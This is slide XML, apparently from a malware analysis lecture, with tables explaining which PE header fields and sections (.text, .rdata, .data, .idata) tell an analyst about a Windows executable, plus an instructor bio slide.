            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="141" name="Google Shape;211;p17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204000" y="1201680"/>
            <a:ext cx="5748840" cy="545904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PE Headers and Sections</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143"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The PE header contains useful information for the malware analyst including</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="144" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="658800" y="2421000"/>
          <a:ext cx="7729200" cy="2595600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2647800"/>
                <a:gridCol w="5081400"/>
              </a:tblGrid>
              <a:tr h="347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Field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nSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ffffff"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Information revealed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347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Imports</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Functions from other lib. used by the malware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347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exports</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Functions in the malware called by others</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r h="347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Time Date Stamp</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Time complied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603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sections</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Names of sections in the file and their sizes on the disk and memory</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r h="603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Subsystem</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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Indicates whether the program is a command-line or GUI app.</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347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Resource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noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Strings, icons, menus and others included.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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Google Shape;226;p19" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="0" t="0" r="55659" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555640" y="1268640"/>
            <a:ext cx="4316040" cy="546552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 name="Google Shape;95;p2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004000" y="1124640"/>
            <a:ext cx="4139640" cy="3104640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91"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Bio</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5544360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93" name="Google Shape;98;p2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36360" y="3915000"/>
            <a:ext cx="3923640" cy="2942640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36360" y="1152360"/>
            <a:ext cx="4967280" cy="2834280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Hometown</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: multiple towns</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Degree</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Ph.D (2014)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Northumbria Unniversity, Newcatle Upon Tyne, UK.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Major: Computer Networks and Communications.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Thesis title: “An Mobility State Adaptive Routing Protocol for Mobile Ad Hoc Netwoks”. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356000" y="4637880"/>
            <a:ext cx="4752000" cy="2834280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Research Interests</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Mobile Ad Hoc and Sensor Networks, QoS Routing, Network Security, Visible Light Communications (VLC), Chaos theory.</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1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Korea – Vietnam Friendship IT College, </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Vietnam – Korea University</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290240" y="755280"/>
            <a:ext cx="6584040" cy="3661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u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ</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PE Headers and Sections</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="148" name="Table 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="558000" y="1199880"/>
          <a:ext cx="8118360" cy="5469120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1983600"/>
                <a:gridCol w="6134760"/>
              </a:tblGrid>
              <a:tr h="444240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.text</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Contains program code</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759960">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.rdata</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Holds read-only data that is globally accessible within the program.</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44240">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.data</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Stores global data accessed throughout the program</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1085760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.idata</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sometimes presents and stores the import function information; if this section is not present, the import function information is stored in the .rdata section.</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1085760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
